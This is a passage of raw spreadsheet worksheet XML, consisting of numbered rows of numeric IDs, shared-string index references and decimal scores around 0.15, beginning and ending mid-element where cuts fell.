        <v>0.1586021505376345</v>
      </c>
    </row>
    <row r="11249" ht="15.75" customHeight="1">
      <c r="A11249" s="1">
        <v>19990.0</v>
      </c>
      <c r="B11249" s="2">
        <v>5.7642947E7</v>
      </c>
      <c r="C11249" s="2" t="s">
        <v>10787</v>
      </c>
      <c r="D11249" s="2">
        <v>1.0</v>
      </c>
      <c r="E11249" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11249" s="2">
        <v>0.1586021505376344</v>
      </c>
    </row>
    <row r="11250" ht="15.75" customHeight="1">
      <c r="A11250" s="1">
        <v>6727.0</v>
      </c>
      <c r="B11250" s="2">
        <v>4.930573E7</v>
      </c>
      <c r="C11250" s="2" t="s">
        <v>10788</v>
      </c>
      <c r="D11250" s="2">
        <v>1.0</v>
      </c>
      <c r="E11250" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11250" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11251" ht="15.75" customHeight="1">
      <c r="A11251" s="1">
        <v>14001.0</v>
      </c>
      <c r="B11251" s="2">
        <v>3.7383699E7</v>
      </c>
      <c r="C11251" s="2" t="s">
        <v>10789</v>
      </c>
      <c r="D11251" s="2">
        <v>1.0</v>
      </c>
      <c r="E11251" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11251" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11252" ht="15.75" customHeight="1">
      <c r="A11252" s="1">
        <v>15251.0</v>
      </c>
      <c r="B11252" s="2">
        <v>4.2286073E7</v>
      </c>
      <c r="C11252" s="2" t="s">
        <v>10790</v>
      </c>
      <c r="D11252" s="2">
        <v>1.0</v>
      </c>
      <c r="E11252" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11252" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11253" ht="15.75" customHeight="1">
      <c r="A11253" s="1">
        <v>15494.0</v>
      </c>
      <c r="B11253" s="2">
        <v>4.3201075E7</v>
      </c>
      <c r="C11253" s="2" t="s">
        <v>10791</v>
      </c>
      <c r="D11253" s="2">
        <v>1.0</v>
      </c>
      <c r="E11253" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11253" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11254" ht="15.75" customHeight="1">
      <c r="A11254" s="1">
        <v>15714.0</v>
      </c>
      <c r="B11254" s="2">
        <v>4.3967815E7</v>
      </c>
      <c r="C11254" s="2" t="s">
        <v>10791</v>
      </c>
      <c r="D11254" s="2">
        <v>1.0</v>
      </c>
      <c r="E11254" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11254" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11255" ht="15.75" customHeight="1">
      <c r="A11255" s="1">
        <v>16230.0</v>
      </c>
      <c r="B11255" s="2">
        <v>4.5732138E7</v>
      </c>
      <c r="C11255" s="2" t="s">
        <v>10792</v>
      </c>
      <c r="D11255" s="2">
        <v>1.0</v>
      </c>
      <c r="E11255" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11255" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11256" ht="15.75" customHeight="1">
      <c r="A11256" s="1">
        <v>16962.0</v>
      </c>
      <c r="B11256" s="2">
        <v>4.8257385E7</v>
      </c>
      <c r="C11256" s="2" t="s">
        <v>10793</v>
      </c>
      <c r="D11256" s="2">
        <v>1.0</v>
      </c>
      <c r="E11256" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11256" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11257" ht="15.75" customHeight="1">
      <c r="A11257" s="1">
        <v>17498.0</v>
      </c>
      <c r="B11257" s="2">
        <v>4.9998004E7</v>
      </c>
      <c r="C11257" s="2" t="s">
        <v>10794</v>
      </c>
      <c r="D11257" s="2">
        <v>1.0</v>
      </c>
      <c r="E11257" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11257" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11258" ht="15.75" customHeight="1">
      <c r="A11258" s="1">
        <v>18478.0</v>
      </c>
      <c r="B11258" s="2">
        <v>5.2868165E7</v>
      </c>
      <c r="C11258" s="2" t="s">
        <v>10795</v>
      </c>
      <c r="D11258" s="2">
        <v>1.0</v>
      </c>
      <c r="E11258" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11258" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11259" ht="15.75" customHeight="1">
      <c r="A11259" s="1">
        <v>19900.0</v>
      </c>
      <c r="B11259" s="2">
        <v>5.7323533E7</v>
      </c>
      <c r="C11259" s="2" t="s">
        <v>10796</v>
      </c>
      <c r="D11259" s="2">
        <v>1.0</v>
      </c>
      <c r="E11259" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11259" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11260" ht="15.75" customHeight="1">
      <c r="A11260" s="1">
        <v>25030.0</v>
      </c>
      <c r="B11260" s="2">
        <v>1.2828729E7</v>
      </c>
      <c r="C11260" s="2" t="s">
        <v>10797</v>
      </c>
      <c r="D11260" s="2">
        <v>1.0</v>
      </c>
      <c r="E11260" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11260" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11261" ht="15.75" customHeight="1">
      <c r="A11261" s="1">
        <v>32151.0</v>
      </c>
      <c r="B11261" s="2">
        <v>5.4279721E7</v>
      </c>
      <c r="C11261" s="2" t="s">
        <v>10798</v>
      </c>
      <c r="D11261" s="2">
        <v>1.0</v>
      </c>
      <c r="E11261" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11261" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="11262" ht="15.75" customHeight="1">
      <c r="A11262" s="1">
        <v>5610.0</v>
      </c>
      <c r="B11262" s="2">
        <v>4.614432E7</v>
      </c>
      <c r="C11262" s="2" t="s">
        <v>10799</v>
      </c>
      <c r="D11262" s="2">
        <v>1.0</v>
      </c>
      <c r="E11262" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11262" s="2">
        <v>0.1579861111111111</v>
      </c>
    </row>
    <row r="11263" ht="15.75" customHeight="1">
      <c r="A11263" s="1">
        <v>8036.0</v>
      </c>
      <c r="B11263" s="2">
        <v>5.2833977E7</v>
      </c>
      <c r="C11263" s="2" t="s">
        <v>10800</v>
      </c>
      <c r="D11263" s="2">
        <v>1.0</v>
      </c>
      <c r="E11263" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11263" s="2">
        <v>0.1578483245149913</v>
      </c>
    </row>
    <row r="11264" ht="15.75" customHeight="1">
      <c r="A11264" s="1">
        <v>3249.0</v>
      </c>
      <c r="B11264" s="2">
        <v>3.7386036E7</v>
      </c>
      <c r="C11264" s="2" t="s">
        <v>10801</v>
      </c>
      <c r="D11264" s="2">
        <v>1.0</v>
      </c>
      <c r="E11264" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11264" s="2">
        <v>0.1575591985428051</v>
      </c>
    </row>
    <row r="11265" ht="15.75" customHeight="1">
      <c r="A11265" s="1">
        <v>7568.0</v>
      </c>
      <c r="B11265" s="2">
        <v>5.1557866E7</v>
      </c>
      <c r="C11265" s="2" t="s">
        <v>10802</v>
      </c>
      <c r="D11265" s="2">
        <v>1.0</v>
      </c>
      <c r="E11265" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11265" s="2">
        <v>0.1571180555555556</v>
      </c>
    </row>
    <row r="11266" ht="15.75" customHeight="1">
      <c r="A11266" s="1">
        <v>34077.0</v>
      </c>
      <c r="B11266" s="2">
        <v>9664273.0</v>
      </c>
      <c r="C11266" s="2" t="s">
        <v>10803</v>
      </c>
      <c r="D11266" s="2">
        <v>1.0</v>
      </c>
      <c r="E11266" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11266" s="2">
        <v>0.1571180555555556</v>
      </c>
    </row>
    <row r="11267" ht="15.75" customHeight="1">
      <c r="A11267" s="1">
        <v>7290.0</v>
      </c>
      <c r="B11267" s="2">
        <v>5.0814994E7</v>
      </c>
      <c r="C11267" s="2" t="s">
        <v>10804</v>
      </c>
      <c r="D11267" s="2">
        <v>1.0</v>
      </c>
      <c r="E11267" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11267" s="2">
        <v>0.1569200779727097</v>
      </c>
    </row>
    <row r="11268" ht="15.75" customHeight="1">
      <c r="A11268" s="1">
        <v>28506.0</v>
      </c>
      <c r="B11268" s="2">
        <v>2.6716403E7</v>
      </c>
      <c r="C11268" s="2" t="s">
        <v>10805</v>
      </c>
      <c r="D11268" s="2">
        <v>1.0</v>
      </c>
      <c r="E11268" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11268" s="2">
        <v>0.1564729867482161</v>
      </c>
    </row>
    <row r="11269" ht="15.75" customHeight="1">
      <c r="A11269" s="1">
        <v>15590.0</v>
      </c>
      <c r="B11269" s="2">
        <v>4.3448897E7</v>
      </c>
      <c r="C11269" s="2" t="s">
        <v>10806</v>
      </c>
      <c r="D11269" s="2">
        <v>1.0</v>
      </c>
      <c r="E11269" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11269" s="2">
        <v>0.1564102564102565</v>
      </c>
    </row>
    <row r="11270" ht="15.75" customHeight="1">
      <c r="A11270" s="1">
        <v>9798.0</v>
      </c>
      <c r="B11270" s="2">
        <v>5.6542766E7</v>
      </c>
      <c r="C11270" s="2" t="s">
        <v>10807</v>
      </c>
      <c r="D11270" s="2">
        <v>1.0</v>
      </c>
      <c r="E11270" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11270" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="11271" ht="15.75" customHeight="1">
      <c r="A11271" s="1">
        <v>14838.0</v>
      </c>
      <c r="B11271" s="2">
        <v>4.1034048E7</v>
      </c>
      <c r="C11271" s="2" t="s">
        <v>10808</v>
      </c>
      <c r="D11271" s="2">
        <v>1.0</v>
      </c>
      <c r="E11271" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11271" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="11272" ht="15.75" customHeight="1">
      <c r="A11272" s="1">
        <v>17627.0</v>
      </c>
      <c r="B11272" s="2">
        <v>5.0381034E7</v>
      </c>
      <c r="C11272" s="2" t="s">
        <v>10809</v>
      </c>
      <c r="D11272" s="2">
        <v>1.0</v>
      </c>
      <c r="E11272" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11272" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="11273" ht="15.75" customHeight="1">
      <c r="A11273" s="1">
        <v>24759.0</v>
      </c>
      <c r="B11273" s="2">
        <v>1.1816895E7</v>
      </c>
      <c r="C11273" s="2" t="s">
        <v>10810</v>
      </c>
      <c r="D11273" s="2">
        <v>1.0</v>
      </c>
      <c r="E11273" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11273" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="11274" ht="15.75" customHeight="1">
      <c r="A11274" s="1">
        <v>27564.0</v>
      </c>
      <c r="B11274" s="2">
        <v>2.242347E7</v>
      </c>
      <c r="C11274" s="2" t="s">
        <v>10811</v>
      </c>
      <c r="D11274" s="2">
        <v>1.0</v>
      </c>
      <c r="E11274" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11274" s="2">
        <v>0.1562962962962963</v>
      </c>
    </row>
    <row r="11275" ht="15.75" customHeight="1">
      <c r="A11275" s="1">
        <v>17933.0</v>
      </c>
      <c r="B11275" s="2">
        <v>5.1238157E7</v>
      </c>
      <c r="C11275" s="2" t="s">
        <v>10812</v>
      </c>
      <c r="D11275" s="2">
        <v>1.0</v>
      </c>
      <c r="E11275" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11275" s="2">
        <v>0.1561302681992338</v>
      </c>
    </row>
    <row r="11276" ht="15.75" customHeight="1">
      <c r="A11276" s="1">
        <v>8101.0</v>
      </c>
      <c r="B11276" s="2">
        <v>5.3060119E7</v>
      </c>
      <c r="C11276" s="2" t="s">
        <v>10813</v>
      </c>
      <c r="D11276" s="2">
        <v>1.0</v>
      </c>
      <c r="E11276" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11276" s="2">
        <v>0.1560846560846562</v>
      </c>
    </row>
    <row r="11277" ht="15.75" customHeight="1">
      <c r="A11277" s="1">
        <v>18780.0</v>
      </c>
      <c r="B11277" s="2">
        <v>5.3813641E7</v>
      </c>
      <c r="C11277" s="2" t="s">
        <v>10814</v>
      </c>
      <c r="D11277" s="2">
        <v>1.0</v>
      </c>
      <c r="E11277" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11277" s="2">
        <v>0.1560846560846561</v>
      </c>
    </row>
    <row r="11278" ht="15.75" customHeight="1">
      <c r="A11278" s="1">
        <v>7426.0</v>
      </c>
      <c r="B11278" s="2">
        <v>5.1160692E7</v>
      </c>
      <c r="C11278" s="2" t="s">
        <v>10815</v>
      </c>
      <c r="D11278" s="2">
        <v>1.0</v>
      </c>
      <c r="E11278" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11278" s="2">
        <v>0.155982905982906</v>
      </c>
    </row>
    <row r="11279" ht="15.75" customHeight="1">
      <c r="A11279" s="1">
        <v>17497.0</v>
      </c>
      <c r="B11279" s="2">
        <v>4.9998004E7</v>
      </c>
      <c r="C11279" s="2" t="s">
        <v>10816</v>
      </c>
      <c r="D11279" s="2">
        <v>1.0</v>
      </c>
      <c r="E11279" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11279" s="2">
        <v>0.155982905982906</v>
      </c>
    </row>
    <row r="11280" ht="15.75" customHeight="1">
      <c r="A11280" s="1">
        <v>18998.0</v>
      </c>
      <c r="B11280" s="2">
        <v>5.4435758E7</v>
      </c>
      <c r="C11280" s="2" t="s">
        <v>10817</v>
      </c>
      <c r="D11280" s="2">
        <v>1.0</v>
      </c>
      <c r="E11280" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11280" s="2">
        <v>0.1557539682539683</v>
      </c>
    </row>
    <row r="11281" ht="15.75" customHeight="1">
      <c r="A11281" s="1">
        <v>25927.0</v>
      </c>
      <c r="B11281" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C11281" s="2" t="s">
        <v>10818</v>
      </c>
      <c r="D11281" s="2">
        <v>1.0</v>
      </c>
      <c r="E11281" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11281" s="2">
        <v>0.1557539682539683</v>
      </c>
    </row>
    <row r="11282" ht="15.75" customHeight="1">
      <c r="A11282" s="1">
        <v>2699.0</v>
      </c>
      <c r="B11282" s="2">
        <v>3.4853902E7</v>
      </c>
      <c r="C11282" s="2" t="s">
        <v>10819</v>
      </c>
      <c r="D11282" s="2">
        <v>1.0</v>
      </c>
      <c r="E11282" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11282" s="2">
        <v>0.1557377049180328</v>
      </c>
    </row>
    <row r="11283" ht="15.75" customHeight="1">
      <c r="A11283" s="1">
        <v>16682.0</v>
      </c>
      <c r="B11283" s="2">
        <v>4.7301662E7</v>
      </c>
      <c r="C11283" s="2" t="s">
        <v>10820</v>
      </c>
      <c r="D11283" s="2">
        <v>1.0</v>
      </c>
      <c r="E11283" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11283" s="2">
        <v>0.1557239057239057</v>
      </c>
    </row>
    <row r="11284" ht="15.75" customHeight="1">
      <c r="A11284" s="1">
        <v>2916.0</v>
      </c>
      <c r="B11284" s="2">
        <v>3.583316E7</v>
      </c>
      <c r="C11284" s="2" t="s">
        <v>10821</v>
      </c>
      <c r="D11284" s="2">
        <v>1.0</v>
      </c>
      <c r="E11284" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11284" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11285" ht="15.75" customHeight="1">
      <c r="A11285" s="1">
        <v>7027.0</v>
      </c>
      <c r="B11285" s="2">
        <v>5.0112416E7</v>
      </c>
      <c r="C11285" s="2" t="s">
        <v>10822</v>
      </c>
      <c r="D11285" s="2">
        <v>1.0</v>
      </c>
      <c r="E11285" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11285" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11286" ht="15.75" customHeight="1">
      <c r="A11286" s="1">
        <v>13899.0</v>
      </c>
      <c r="B11286" s="2">
        <v>3.7051128E7</v>
      </c>
      <c r="C11286" s="2" t="s">
        <v>10823</v>
      </c>
      <c r="D11286" s="2">
        <v>1.0</v>
      </c>
      <c r="E11286" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11286" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11287" ht="15.75" customHeight="1">
      <c r="A11287" s="1">
        <v>14431.0</v>
      </c>
      <c r="B11287" s="2">
        <v>3.9265777E7</v>
      </c>
      <c r="C11287" s="2" t="s">
        <v>10824</v>
      </c>
      <c r="D11287" s="2">
        <v>1.0</v>
      </c>
      <c r="E11287" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11287" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11288" ht="15.75" customHeight="1">
      <c r="A11288" s="1">
        <v>16793.0</v>
      </c>
      <c r="B11288" s="2">
        <v>4.7763876E7</v>
      </c>
      <c r="C11288" s="2" t="s">
        <v>10825</v>
      </c>
      <c r="D11288" s="2">
        <v>1.0</v>
      </c>
      <c r="E11288" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11288" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11289" ht="15.75" customHeight="1">
      <c r="A11289" s="1">
        <v>16877.0</v>
      </c>
      <c r="B11289" s="2">
        <v>4.7972462E7</v>
      </c>
      <c r="C11289" s="2" t="s">
        <v>10826</v>
      </c>
      <c r="D11289" s="2">
        <v>1.0</v>
      </c>
      <c r="E11289" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11289" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11290" ht="15.75" customHeight="1">
      <c r="A11290" s="1">
        <v>18180.0</v>
      </c>
      <c r="B11290" s="2">
        <v>5.1986822E7</v>
      </c>
      <c r="C11290" s="2" t="s">
        <v>10827</v>
      </c>
      <c r="D11290" s="2">
        <v>1.0</v>
      </c>
      <c r="E11290" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11290" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11291" ht="15.75" customHeight="1">
      <c r="A11291" s="1">
        <v>21477.0</v>
      </c>
      <c r="B11291" s="2">
        <v>2.297601E7</v>
      </c>
      <c r="C11291" s="2" t="s">
        <v>10828</v>
      </c>
      <c r="D11291" s="2">
        <v>1.0</v>
      </c>
      <c r="E11291" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11291" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11292" ht="15.75" customHeight="1">
      <c r="A11292" s="1">
        <v>21681.0</v>
      </c>
      <c r="B11292" s="2">
        <v>2.5057159E7</v>
      </c>
      <c r="C11292" s="2" t="s">
        <v>10829</v>
      </c>
      <c r="D11292" s="2">
        <v>1.0</v>
      </c>
      <c r="E11292" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11292" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11293" ht="15.75" customHeight="1">
      <c r="A11293" s="1">
        <v>22211.0</v>
      </c>
      <c r="B11293" s="2">
        <v>3.2166601E7</v>
      </c>
      <c r="C11293" s="2" t="s">
        <v>10830</v>
      </c>
      <c r="D11293" s="2">
        <v>1.0</v>
      </c>
      <c r="E11293" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11293" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="11294" ht="15.75" customHeight="1">
      <c r="A11294" s="1">
        <v>31885.0</v>
      </c>
      <c r="B11294" s="2">
        <v>5.2866822E7</v>
      </c>
      <c r="C11294" s="2" t="s">
        <v>10831</v>
      </c>
      <c r="D11294" s="2">
        <v>1.0</v>
      </c>
      <c r="E11294" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11294" s="2">
        <v>0.1549707602339182</v>
      </c>
    </row>
    <row r="11295" ht="15.75" customHeight="1">
      <c r="A11295" s="1">
        <v>32197.0</v>
      </c>
      <c r="B11295" s="2">
        <v>5.4754699E7</v>
      </c>
      <c r="C11295" s="2" t="s">
        <v>10832</v>
      </c>
      <c r="D11295" s="2">
        <v>1.0</v>
      </c>
      <c r="E11295" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11295" s="2">
        <v>0.1549019607843138</v>
      </c>
    </row>
    <row r="11296" ht="15.75" customHeight="1">
      <c r="A11296" s="1">
        <v>13693.0</v>
      </c>
      <c r="B11296" s="2">
        <v>3.6121361E7</v>
      </c>
      <c r="C11296" s="2" t="s">
        <v>10833</v>
      </c>
      <c r="D11296" s="2">
        <v>1.0</v>
      </c>
      <c r="E11296" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11296" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="11297" ht="15.75" customHeight="1">
      <c r="A11297" s="1">
        <v>18674.0</v>
      </c>
      <c r="B11297" s="2">
        <v>5.3560435E7</v>
      </c>
      <c r="C11297" s="2" t="s">
        <v>10834</v>
      </c>
      <c r="D11297" s="2">
        <v>1.0</v>
      </c>
      <c r="E11297" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11297" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="11298" ht="15.75" customHeight="1">
      <c r="A11298" s="1">
        <v>8053.0</v>
      </c>
      <c r="B11298" s="2">
        <v>5.2880605E7</v>
      </c>
      <c r="C11298" s="2" t="s">
        <v>10835</v>
      </c>
      <c r="D11298" s="2">
        <v>1.0</v>
      </c>
      <c r="E11298" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11298" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="11299" ht="15.75" customHeight="1">
      <c r="A11299" s="1">
        <v>5209.0</v>
      </c>
      <c r="B11299" s="2">
        <v>4.4934679E7</v>
      </c>
      <c r="C11299" s="2" t="s">
        <v>10836</v>
      </c>
      <c r="D11299" s="2">
        <v>1.0</v>
      </c>
      <c r="E11299" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11299" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="11300" ht="15.75" customHeight="1">
      <c r="A11300" s="1">
        <v>6321.0</v>
      </c>
      <c r="B11300" s="2">
        <v>4.8265952E7</v>
      </c>
      <c r="C11300" s="2" t="s">
        <v>10837</v>
      </c>
      <c r="D11300" s="2">
        <v>1.0</v>
      </c>
      <c r="E11300" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11300" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="11301" ht="15.75" customHeight="1">
      <c r="A11301" s="1">
        <v>29282.0</v>
      </c>
      <c r="B11301" s="2">
        <v>3.1011405E7</v>
      </c>
      <c r="C11301" s="2" t="s">
        <v>10838</v>
      </c>
      <c r="D11301" s="2">
        <v>1.0</v>
      </c>
      <c r="E11301" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11301" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="11302" ht="15.75" customHeight="1">
      <c r="A11302" s="1">
        <v>10033.0</v>
      </c>
      <c r="B11302" s="2">
        <v>5.7056039E7</v>
      </c>
      <c r="C11302" s="2" t="s">
        <v>10839</v>
      </c>
      <c r="D11302" s="2">
        <v>1.0</v>
      </c>
      <c r="E11302" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11302" s="2">
        <v>0.1536458333333334</v>
      </c>
    </row>
    <row r="11303" ht="15.75" customHeight="1">
      <c r="A11303" s="1">
        <v>15123.0</v>
      </c>
      <c r="B11303" s="2">
        <v>4.1887267E7</v>
      </c>
      <c r="C11303" s="2" t="s">
        <v>10840</v>
      </c>
      <c r="D11303" s="2">
        <v>1.0</v>
      </c>
      <c r="E11303" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11303" s="2">
        <v>0.1536458333333334</v>
      </c>
    </row>
    <row r="11304" ht="15.75" customHeight="1">
      <c r="A11304" s="1">
        <v>16538.0</v>
      </c>
      <c r="B11304" s="2">
        <v>4.6771483E7</v>
      </c>
      <c r="C11304" s="2" t="s">
        <v>10841</v>
      </c>
      <c r="D11304" s="2">
        <v>1.0</v>
      </c>
      <c r="E11304" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11304" s="2">
        <v>0.1535493827160495</v>
      </c>
    </row>
    <row r="11305" ht="15.75" customHeight="1">
      <c r="A11305" s="1">
        <v>9138.0</v>
      </c>
      <c r="B11305" s="2">
        <v>5.5246744E7</v>
      </c>
      <c r="C11305" s="2" t="s">
        <v>10842</v>
      </c>
      <c r="D11305" s="2">
        <v>1.0</v>
      </c>
      <c r="E11305" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11305" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="11306" ht="15.75" customHeight="1">
      <c r="A11306" s="1">
        <v>21036.0</v>
      </c>
      <c r="B11306" s="2">
        <v>1.76047E7</v>
      </c>
      <c r="C11306" s="2" t="s">
        <v>10829</v>
      </c>
      <c r="D11306" s="2">
        <v>1.0</v>
      </c>
      <c r="E11306" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11306" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="11307" ht="15.75" customHeight="1">
      <c r="A11307" s="1">
        <v>9718.0</v>
      </c>
      <c r="B11307" s="2">
        <v>5.6405089E7</v>
      </c>
      <c r="C11307" s="2" t="s">
        <v>10843</v>
      </c>
      <c r="D11307" s="2">
        <v>1.0</v>
      </c>
      <c r="E11307" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11307" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="11308" ht="15.75" customHeight="1">
      <c r="A11308" s="1">
        <v>17927.0</v>
      </c>
      <c r="B11308" s="2">
        <v>5.1182644E7</v>
      </c>
      <c r="C11308" s="2" t="s">
        <v>10844</v>
      </c>
      <c r="D11308" s="2">
        <v>1.0</v>
      </c>
      <c r="E11308" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11308" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="11309" ht="15.75" customHeight="1">
      <c r="A11309" s="1">
        <v>23918.0</v>
      </c>
      <c r="B11309" s="2">
        <v>8536174.0</v>
      </c>
      <c r="C11309" s="2" t="s">
        <v>10845</v>
      </c>
      <c r="D11309" s="2">
        <v>1.0</v>
      </c>
      <c r="E11309" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11309" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="11310" ht="15.75" customHeight="1">
      <c r="A11310" s="1">
        <v>18521.0</v>
      </c>
      <c r="B11310" s="2">
        <v>5.3016242E7</v>
      </c>
      <c r="C11310" s="2" t="s">
        <v>10846</v>
      </c>
      <c r="D11310" s="2">
        <v>1.0</v>
      </c>
      <c r="E11310" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11310" s="2">
        <v>0.1534722222222222</v>
      </c>
    </row>
    <row r="11311" ht="15.75" customHeight="1">
      <c r="A11311" s="1">
        <v>9736.0</v>
      </c>
      <c r="B11311" s="2">
        <v>5.6451937E7</v>
      </c>
      <c r="C11311" s="2" t="s">
        <v>10847</v>
      </c>
      <c r="D11311" s="2">
        <v>1.0</v>
      </c>
      <c r="E11311" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11311" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="11312" ht="15.75" customHeight="1">
      <c r="A11312" s="1">
        <v>23136.0</v>
      </c>
      <c r="B11312" s="2">
        <v>5.1569448E7</v>
      </c>
      <c r="C11312" s="2" t="s">
        <v>10848</v>
      </c>
      <c r="D11312" s="2">
        <v>1.0</v>
      </c>
      <c r="E11312" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11312" s="2">
        <v>0.152991452991453</v>
      </c>
    </row>
    <row r="11313" ht="15.75" customHeight="1">
      <c r="A11313" s="1">
        <v>6399.0</v>
      </c>
      <c r="B11313" s="2">
        <v>4.8474948E7</v>
      </c>
      <c r="C11313" s="2" t="s">
        <v>10849</v>
      </c>
      <c r="D11313" s="2">
        <v>1.0</v>
      </c>
      <c r="E11313" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11313" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="11314" ht="15.75" customHeight="1">
      <c r="A11314" s="1">
        <v>6984.0</v>
      </c>
      <c r="B11314" s="2">
        <v>5.0044885E7</v>
      </c>
      <c r="C11314" s="2" t="s">
        <v>10850</v>
      </c>
      <c r="D11314" s="2">
        <v>1.0</v>
      </c>
      <c r="E11314" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11314" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="11315" ht="15.75" customHeight="1">
      <c r="A11315" s="1">
        <v>14403.0</v>
      </c>
      <c r="B11315" s="2">
        <v>3.9185523E7</v>
      </c>
      <c r="C11315" s="2" t="s">
        <v>10851</v>
      </c>
      <c r="D11315" s="2">
        <v>1.0</v>
      </c>
      <c r="E11315" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11315" s="2">
